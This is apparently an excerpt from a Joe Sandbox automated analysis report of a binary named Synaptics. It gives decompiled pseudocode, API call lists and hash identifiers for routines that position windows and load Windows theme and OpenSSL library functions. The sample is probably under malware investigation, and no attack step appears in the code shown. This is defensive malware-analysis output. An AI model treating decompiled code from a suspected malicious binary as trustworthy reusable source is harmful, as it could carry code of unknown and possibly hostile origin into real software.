                                                                                                                                                                                                                            						_t36 = E00441704( *((intOrPtr*)(_t40 + 0x44)));
                                                                                                                                                                                                                            						_t13 = _t40 + 0x30; // 0x0
                                                                                                                                                                                                                            						SetWindowPos( *_t13, _t36,  *( *((intOrPtr*)(_t40 + 0x44)) + 0x40),  *( *((intOrPtr*)(_t40 + 0x44)) + 0x44),  *(_t43 + 0x48), 0, 0x40);
                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                            						_push(0xf020);
                                                                                                                                                                                                                            						_push(0x112);
                                                                                                                                                                                                                            						_t14 = _t40 + 0x30; // 0x0
                                                                                                                                                                                                                            						_t21 =  *_t14;
                                                                                                                                                                                                                            						_push(_t21);
                                                                                                                                                                                                                            						L00407540();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if( *((short*)(_t40 + 0x11a)) != 0) {
                                                                                                                                                                                                                            						return  *((intOrPtr*)(_t40 + 0x118))();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t21;
                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • IsIconic.USER32 ref: 0045A05C
                                                                                                                                                                                                                            • SetActiveWindow.USER32(00000000,00000000,?,?,0045A790), ref: 0045A074
                                                                                                                                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 0045A097
                                                                                                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,?,?,?,00000000,00000040,00000000,00000000,00000000,?,?,0045A790), ref: 0045A0C0
                                                                                                                                                                                                                            • NtdllDefWindowProc_A.USER32(00000000,00000112,0000F020,00000000,00000000,00000000,?,?,?,00000000,00000040,00000000,00000000,00000000), ref: 0045A0D5
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Window$ActiveEnabledIconicNtdllProc_
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1720852555-0
                                                                                                                                                                                                                            • Opcode ID: 8ef17a5689defe69a59b169c72c27f81d88e002240e7c90d7581b2bd6a1a7dc2
                                                                                                                                                                                                                            • Instruction ID: fcf5efa9db48042d746d78bebf6e1cf2cc32c712e84d9ef6b3749e70c2da43cc
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8ef17a5689defe69a59b169c72c27f81d88e002240e7c90d7581b2bd6a1a7dc2
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EF110071650200EBDB54EE69C9C6B9637E8AF04715F0800AABF04DF2D7D679EC448759
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                                                                                            			E0042C6FC(void* __edi, struct HWND__* _a4, signed int _a8) {
                                                                                                                                                                                                                            				struct _WINDOWPLACEMENT _v48;
                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				signed int _t19;
                                                                                                                                                                                                                            				intOrPtr _t21;
                                                                                                                                                                                                                            				struct HWND__* _t23;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t19 = _a8;
                                                                                                                                                                                                                            				_t23 = _a4;
                                                                                                                                                                                                                            				if( *0x49e929 != 0) {
                                                                                                                                                                                                                            					if((_t19 & 0x00000003) == 0) {
                                                                                                                                                                                                                            						if(IsIconic(_t23) == 0) {
                                                                                                                                                                                                                            							GetWindowRect(_t23,  &(_v48.rcNormalPosition));
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							GetWindowPlacement(_t23,  &_v48);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						return E0042C66C( &(_v48.rcNormalPosition), _t19);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					return 0x12340042;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t21 =  *0x49e904; // 0x42c6fc
                                                                                                                                                                                                                            				 *0x49e904 = E0042C4FC(1, _t19, _t21, __edi, _t23);
                                                                                                                                                                                                                            				return  *0x49e904(_t23, _t19);
                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressProc
                                                                                                                                                                                                                            • String ID: MonitorFromWindow
                                                                                                                                                                                                                            • API String ID: 190572456-2842599566
                                                                                                                                                                                                                            • Opcode ID: 2850c889a9a11c96de1ba7b4d63e14319c300ad4c71145359c67bc565aba3dd9
                                                                                                                                                                                                                            • Instruction ID: a470fbf3681d2cee79b4262df8cd97740cfa3d316a724833ce9ade3e4696291a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2850c889a9a11c96de1ba7b4d63e14319c300ad4c71145359c67bc565aba3dd9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1201ADB1A051296A8B00EB65ADC19BF735C9B84354B900037F810A3241D72CBE019BAE
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 90%
                                                                                                                                                                                                                            			E0042E3B4(void* __ebx, void* __ecx) {
                                                                                                                                                                                                                            				char _v5;
                                                                                                                                                                                                                            				intOrPtr _t2;
                                                                                                                                                                                                                            				intOrPtr _t6;
                                                                                                                                                                                                                            				intOrPtr _t108;
                                                                                                                                                                                                                            				intOrPtr _t111;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t2 =  *0x49ea48; // 0x21e0dc8
                                                                                                                                                                                                                            				E0042E1AC(_t2);
                                                                                                                                                                                                                            				_push(_t111);
                                                                                                                                                                                                                            				_push(0x42e767);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t111;
                                                                                                                                                                                                                            				 *0x49ea44 =  *0x49ea44 + 1;
                                                                                                                                                                                                                            				if( *0x49ea40 == 0) {
                                                                                                                                                                                                                            					 *0x49ea40 = LoadLibraryA("uxtheme.dll");
                                                                                                                                                                                                                            					if( *0x49ea40 > 0) {
                                                                                                                                                                                                                            						 *0x49e980 = GetProcAddress( *0x49ea40, "OpenThemeData");
                                                                                                                                                                                                                            						 *0x49e984 = GetProcAddress( *0x49ea40, "CloseThemeData");
                                                                                                                                                                                                                            						 *0x49e988 = GetProcAddress( *0x49ea40, "DrawThemeBackground");
                                                                                                                                                                                                                            						 *0x49e98c = GetProcAddress( *0x49ea40, "DrawThemeText");
                                                                                                                                                                                                                            						 *0x49e990 = GetProcAddress( *0x49ea40, "GetThemeBackgroundContentRect");
                                                                                                                                                                                                                            						 *0x49e994 = GetProcAddress( *0x49ea40, "GetThemeBackgroundContentRect");
                                                                                                                                                                                                                            						 *0x49e998 = GetProcAddress( *0x49ea40, "GetThemePartSize");
                                                                                                                                                                                                                            						 *0x49e99c = GetProcAddress( *0x49ea40, "GetThemeTextExtent");
                                                                                                                                                                                                                            						 *0x49e9a0 = GetProcAddress( *0x49ea40, "GetThemeTextMetrics");
                                                                                                                                                                                                                            						 *0x49e9a4 = GetProcAddress( *0x49ea40, "GetThemeBackgroundRegion");
                                                                                                                                                                                                                            						 *0x49e9a8 = GetProcAddress( *0x49ea40, "HitTestThemeBackground");
                                                                                                                                                                                                                            						 *0x49e9ac = GetProcAddress( *0x49ea40, "DrawThemeEdge");
                                                                                                                                                                                                                            						 *0x49e9b0 = GetProcAddress( *0x49ea40, "DrawThemeIcon");
                                                                                                                                                                                                                            						 *0x49e9b4 = GetProcAddress( *0x49ea40, "IsThemePartDefined");
                                                                                                                                                                                                                            						 *0x49e9b8 = GetProcAddress( *0x49ea40, "IsThemeBackgroundPartiallyTransparent");
                                                                                                                                                                                                                            						 *0x49e9bc = GetProcAddress( *0x49ea40, "GetThemeColor");
                                                                                                                                                                                                                            						 *0x49e9c0 = GetProcAddress( *0x49ea40, "GetThemeMetric");
                                                                                                                                                                                                                            						 *0x49e9c4 = GetProcAddress( *0x49ea40, "GetThemeString");
                                                                                                                                                                                                                            						 *0x49e9c8 = GetProcAddress( *0x49ea40, "GetThemeBool");
                                                                                                                                                                                                                            						 *0x49e9cc = GetProcAddress( *0x49ea40, "GetThemeInt");
                                                                                                                                                                                                                            						 *0x49e9d0 = GetProcAddress( *0x49ea40, "GetThemeEnumValue");
                                                                                                                                                                                                                            						 *0x49e9d4 = GetProcAddress( *0x49ea40, "GetThemePosition");
                                                                                                                                                                                                                            						 *0x49e9d8 = GetProcAddress( *0x49ea40, "GetThemeFont");
                                                                                                                                                                                                                            						 *0x49e9dc = GetProcAddress( *0x49ea40, "GetThemeRect");
                                                                                                                                                                                                                            						 *0x49e9e0 = GetProcAddress( *0x49ea40, "GetThemeMargins");
                                                                                                                                                                                                                            						 *0x49e9e4 = GetProcAddress( *0x49ea40, "GetThemeIntList");
                                                                                                                                                                                                                            						 *0x49e9e8 = GetProcAddress( *0x49ea40, "GetThemePropertyOrigin");
                                                                                                                                                                                                                            						 *0x49e9ec = GetProcAddress( *0x49ea40, "SetWindowTheme");
                                                                                                                                                                                                                            						 *0x49e9f0 = GetProcAddress( *0x49ea40, "GetThemeFilename");
                                                                                                                                                                                                                            						 *0x49e9f4 = GetProcAddress( *0x49ea40, "GetThemeSysColor");
                                                                                                                                                                                                                            						 *0x49e9f8 = GetProcAddress( *0x49ea40, "GetThemeSysColorBrush");
                                                                                                                                                                                                                            						 *0x49e9fc = GetProcAddress( *0x49ea40, "GetThemeSysBool");
                                                                                                                                                                                                                            						 *0x49ea00 = GetProcAddress( *0x49ea40, "GetThemeSysSize");
                                                                                                                                                                                                                            						 *0x49ea04 = GetProcAddress( *0x49ea40, "GetThemeSysFont");
                                                                                                                                                                                                                            						 *0x49ea08 = GetProcAddress( *0x49ea40, "GetThemeSysString");
                                                                                                                                                                                                                            						 *0x49ea0c = GetProcAddress( *0x49ea40, "GetThemeSysInt");
                                                                                                                                                                                                                            						 *0x49ea10 = GetProcAddress( *0x49ea40, "IsThemeActive");
                                                                                                                                                                                                                            						 *0x49ea14 = GetProcAddress( *0x49ea40, "IsAppThemed");
                                                                                                                                                                                                                            						 *0x49ea18 = GetProcAddress( *0x49ea40, "GetWindowTheme");
                                                                                                                                                                                                                            						 *0x49ea1c = GetProcAddress( *0x49ea40, "EnableThemeDialogTexture");
                                                                                                                                                                                                                            						 *0x49ea20 = GetProcAddress( *0x49ea40, "IsThemeDialogTextureEnabled");
                                                                                                                                                                                                                            						 *0x49ea24 = GetProcAddress( *0x49ea40, "GetThemeAppProperties");
                                                                                                                                                                                                                            						 *0x49ea28 = GetProcAddress( *0x49ea40, "SetThemeAppProperties");
                                                                                                                                                                                                                            						 *0x49ea2c = GetProcAddress( *0x49ea40, "GetCurrentThemeName");
                                                                                                                                                                                                                            						 *0x49ea30 = GetProcAddress( *0x49ea40, "GetThemeDocumentationProperty");
                                                                                                                                                                                                                            						 *0x49ea34 = GetProcAddress( *0x49ea40, "DrawThemeParentBackground");
                                                                                                                                                                                                                            						 *0x49ea38 = GetProcAddress( *0x49ea40, "EnableTheming");
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_v5 =  *0x49ea40 > 0;
                                                                                                                                                                                                                            				_pop(_t108);
                                                                                                                                                                                                                            				 *[fs:eax] = _t108;
                                                                                                                                                                                                                            				_push(0x42e76e);
                                                                                                                                                                                                                            				_t6 =  *0x49ea48; // 0x21e0dc8
                                                                                                                                                                                                                            				return E0042E1B4(_t6);
                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                            0x0042e5c9
                                                                                                                                                                                                                            0x0042e5db
                                                                                                                                                                                                                            0x0042e5ed
                                                                                                                                                                                                                            0x0042e5ff
                                                                                                                                                                                                                            0x0042e611
                                                                                                                                                                                                                            0x0042e623
                                                                                                                                                                                                                            0x0042e635
                                                                                                                                                                                                                            0x0042e647
                                                                                                                                                                                                                            0x0042e659
                                                                                                                                                                                                                            0x0042e66b
                                                                                                                                                                                                                            0x0042e67d
                                                                                                                                                                                                                            0x0042e68f
                                                                                                                                                                                                                            0x0042e6a1
                                                                                                                                                                                                                            0x0042e6b3
                                                                                                                                                                                                                            0x0042e6c5
                                                                                                                                                                                                                            0x0042e6d7
                                                                                                                                                                                                                            0x0042e6e9
                                                                                                                                                                                                                            0x0042e6fb
                                                                                                                                                                                                                            0x0042e70d
                                                                                                                                                                                                                            0x0042e71f
                                                                                                                                                                                                                            0x0042e731
                                                                                                                                                                                                                            0x0042e743
                                                                                                                                                                                                                            0x0042e743
                                                                                                                                                                                                                            0x0042e3f4
                                                                                                                                                                                                                            0x0042e74b
                                                                                                                                                                                                                            0x0042e751
                                                                                                                                                                                                                            0x0042e754
                                                                                                                                                                                                                            0x0042e757
                                                                                                                                                                                                                            0x0042e75c
                                                                                                                                                                                                                            0x0042e766

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(uxtheme.dll,00000000,0042E767), ref: 0042E3EA
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0042E402
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0042E414
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0042E426
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0042E438
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0042E44A
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0042E45C
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0042E46E
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0042E480
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0042E492
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0042E4A4
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0042E4B6
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0042E4C8
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0042E4DA
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0042E4EC
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0042E4FE
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0042E510
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0042E522
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0042E534
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0042E546
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0042E558
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0042E56A
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0042E57C
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0042E58E
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0042E5A0
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0042E5B2
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0042E5C4
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0042E5D6
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0042E5E8
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0042E5FA
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0042E60C
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0042E61E
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0042E630
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0042E642
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0042E654
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0042E666
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0042E678
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0042E68A
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0042E69C
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0042E6AE
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0042E6C0
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0042E6D2
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0042E6E4
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0042E6F6
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0042E708
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0042E71A
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0042E72C
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0042E73E
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                            • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                                                                                                                                                                            • API String ID: 2238633743-2910565190
                                                                                                                                                                                                                            • Opcode ID: 8d86ba1094030d790a56e86b91411d8c7853f90e04823d3f43234c390784be56
                                                                                                                                                                                                                            • Instruction ID: 583b1748ec7c75dcc55376f1719c3b0464f23e6b29e7b95583f9f44409200d59
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8d86ba1094030d790a56e86b91411d8c7853f90e04823d3f43234c390784be56
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 08A1F2B0F48660AFDB00EB67EC96B2637A8EB15704350467BB400DF696D67DA8009B5E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004906B8() {
                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                            				void* _t158;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t158 = 1;
                                                                                                                                                                                                                            				if( *0x49d588 == 0) {
                                                                                                                                                                                                                            					 *0x49d588 = LoadLibraryA("libeay32.dll");
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t160 =  *0x49d584;
                                                                                                                                                                                                                            				if( *0x49d584 == 0) {
                                                                                                                                                                                                                            					 *0x49d584 = LoadLibraryA("ssleay32.dll");
                                                                                                                                                                                                                            					 *0x49d454 = E0049058C("SSL_CTX_set_cipher_list", _t158);
                                                                                                                                                                                                                            					 *0x49d458 = E0049058C("SSL_CTX_new", _t158);
                                                                                                                                                                                                                            					 *0x49d45c = E0049058C("SSL_CTX_free", _t158);
                                                                                                                                                                                                                            					 *0x49d460 = E0049058C("SSL_set_fd", _t158);
                                                                                                                                                                                                                            					 *0x49d464 = E0049058C("SSL_CTX_use_PrivateKey_file", _t158);
                                                                                                                                                                                                                            					 *0x49d468 = E0049058C("SSL_CTX_use_certificate_file", _t158);
                                                                                                                                                                                                                            					 *0x49d46c = E0049058C("SSL_load_error_strings", _t158);
                                                                                                                                                                                                                            					 *0x49d470 = E0049058C("SSL_state_string_long", _t158);
                                                                                                                                                                                                                            					 *0x49d474 = E0049058C("SSL_get_peer_certificate", _t158);
                                                                                                                                                                                                                            					 *0x49d478 = E0049058C("SSL_CTX_set_verify", _t158);
                                                                                                                                                                                                                            					 *0x49d47c = E0049058C("SSL_CTX_set_verify_depth", _t158);
                                                                                                                                                                                                                            					 *0x49d480 = E0049058C("SSL_CTX_get_verify_depth", _t158);
                                                                                                                                                                                                                            					 *0x49d484 = E0049058C("SSL_CTX_set_default_passwd_cb", _t158);
                                                                                                                                                                                                                            					 *0x49d488 = E0049058C("SSL_CTX_set_default_passwd_cb_userdata", _t158);
                                                                                                                                                                                                                            					 *0x49d48c = E0049058C("SSL_CTX_check_private_key", _t158);
                                                                                                                                                                                                                            					 *0x49d490 = E0049058C("SSL_new", _t158);
                                                                                                                                                                                                                            					 *0x49d494 = E0049058C("SSL_free", _t158);
                                                                                                                                                                                                                            					 *0x49d498 = E0049058C("SSL_accept", _t158);
                                                                                                                                                                                                                            					 *0x49d49c = E0049058C("SSL_connect", _t158);
                                                                                                                                                                                                                            					 *0x49d4a0 = E0049058C("SSL_read", _t158);
                                                                                                                                                                                                                            					 *0x49d4a4 = E0049058C("SSL_peek", _t158);
                                                                                                                                                                                                                            					 *0x49d4a8 = E0049058C("SSL_write", _t158);
                                                                                                                                                                                                                            					 *0x49d4ac = E0049058C("SSL_get_error", _t158);
                                                                                                                                                                                                                            					 *0x49d4b0 = E0049058C("SSLv2_method", _t158);
                                                                                                                                                                                                                            					 *0x49d4b4 = E0049058C("SSLv2_server_method", _t158);
                                                                                                                                                                                                                            					 *0x49d4b8 = E0049058C("SSLv2_client_method", _t158);
                                                                                                                                                                                                                            					 *0x49d4bc = E0049058C("SSLv3_method", _t158);
                                                                                                                                                                                                                            					 *0x49d4c0 = E0049058C("SSLv3_server_method", _t158);
                                                                                                                                                                                                                            					 *0x49d4c4 = E0049058C("SSLv3_client_method", _t158);
                                                                                                                                                                                                                            					 *0x49d4c8 = E0049058C("SSLv23_method", _t158);
                                                                                                                                                                                                                            					 *0x49d4cc = E0049058C("SSLv23_server_method", _t158);
                                                                                                                                                                                                                            					 *0x49d4d0 = E0049058C("SSLv23_client_method", _t158);
                                                                                                                                                                                                                            					 *0x49d4d4 = E0049058C("TLSv1_method", _t158);
                                                                                                                                                                                                                            					 *0x49d4d8 = E0049058C("TLSv1_server_method", _t158);
                                                                                                                                                                                                                            					 *0x49d4dc = E0049058C("TLSv1_client_method", _t158);
                                                                                                                                                                                                                            					 *0x49d4e0 = E0049058C("SSL_shutdown", _t158);
                                                                                                                                                                                                                            					 *0x49d4e4 = E0049058C("SSL_set_connect_state", _t158);
                                                                                                                                                                                                                            					 *0x49d4e8 = E0049058C("SSL_set_accept_state", _t158);
                                                                                                                                                                                                                            					 *0x49d4ec = E0049058C("SSL_set_shutdown", _t158);
                                                                                                                                                                                                                            					 *0x49d4f0 = E0049058C("SSL_CTX_load_verify_locations", _t158);
                                                                                                                                                                                                                            					 *0x49d4f4 = E0049058C("SSL_get_session", _t158);
                                                                                                                                                                                                                            					 *0x49d4f8 = E0049058C("SSL_library_init", _t158);
                                                                                                                                                                                                                            					 *0x49d4fc = E004905FC("SSL_CTX_set_info_callback_indy", _t158, _t160);
                                                                                                                                                                                                                            					 *0x49d500 = E004905FC("X509_STORE_CTX_get_app_data_indy", _t158, _t160);
                                                                                                                                                                                                                            					 *0x49d504 = E004905FC("SSL_SESSION_get_id_indy", _t158, _t160);
                                                                                                                                                                                                                            					 *0x49d508 = E004905FC("SSL_SESSION_get_id_ctx_indy", _t158, _t160);
                                                                                                                                                                                                                            					 *0x49d50c = E004905FC("SSL_CTX_get_version_indy", _t158, _t160);
                                                                                                                                                                                                                            					 *0x49d510 = E004905FC("SSL_CTX_set_options_indy", _t158, _t160);
                                                                                                                                                                                                                            					 *0x49d514 = E00490648("X509_NAME_oneline", _t158);
                                                                                                                                                                                                                            					 *0x49d518 = E0049058C("X509_NAME_hash", _t158);
                                                                                                                                                                                                                            					 *0x49d51c = E00490648("X509_set_issuer_name", _t158);
                                                                                                                                                                                                                            					 *0x49d520 = E00490648("X509_get_issuer_name", _t158);
                                                                                                                                                                                                                            					 *0x49d524 = E00490648("X509_set_subject_name", _t158);
                                                                                                                                                                                                                            					 *0x49d528 = E00490648("X509_get_subject_name", _t158);
                                                                                                                                                                                                                            					 *0x49d52c = E0049058C("X509_digest", _t158);
                                                                                                                                                                                                                            					 *0x49d530 = E0049058C("EVP_md5", _t158);
                                                                                                                                                                                                                            					 *0x49d534 = E004905FC("X509_get_notBefore_indy", _t158, _t160);
                                                                                                                                                                                                                            					 *0x49d538 = E004905FC("X509_get_notAfter_indy", _t158, _t160);
                                                                                                                                                                                                                            					 *0x49d53c = E00490648("X509_STORE_CTX_get_error", _t158);
                                                                                                                                                                                                                            					 *0x49d540 = E00490648("X509_STORE_CTX_set_error", _t158);
                                                                                                                                                                                                                            					 *0x49d544 = E00490648("X509_STORE_CTX_get_error_depth", _t158);
                                                                                                                                                                                                                            					 *0x49d548 = E00490648("X509_STORE_CTX_get_current_cert", _t158);
                                                                                                                                                                                                                            					 *0x49d590 = E00490648("RAND_screen", _t158);
                                                                                                                                                                                                                            					 *0x49d54c = E00490648("des_set_odd_parity", _t158);
                                                                                                                                                                                                                            					 *0x49d550 = E00490648("des_set_key", _t158);
                                                                                                                                                                                                                            					 *0x49d554 = E00490648("des_ecb_encrypt", _t158);
                                                                                                                                                                                                                            					 *0x49d558 = E0049058C("SSL_set_ex_data", _t158);
                                                                                                                                                                                                                            					 *0x49d55c = E0049058C("SSL_get_ex_data", _t158);
                                                                                                                                                                                                                            					 *0x49d560 = E0049058C("SSL_load_client_CA_file", _t158);
                                                                                                                                                                                                                            					 *0x49d564 = E0049058C("SSL_CTX_set_client_CA_list", _t158);
                                                                                                                                                                                                                            					 *0x49d568 = E0049058C("SSL_CTX_set_default_verify_paths", _t158);
                                                                                                                                                                                                                            					 *0x49d56c = E0049058C("SSL_CTX_set_session_id_context", _t158);
                                                                                                                                                                                                                            					 *0x49d570 = E0049058C("SSL_CIPHER_description", _t158);
